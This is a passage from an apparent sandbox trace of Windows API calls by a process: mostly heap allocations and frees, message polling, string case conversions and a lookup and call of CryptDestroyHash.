(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.895] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.895] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.895] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.896] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.896] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0165.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0165.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0165.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.899] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0165.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.900] CryptDestroyHash (hHash=0xaa5660) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.902] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 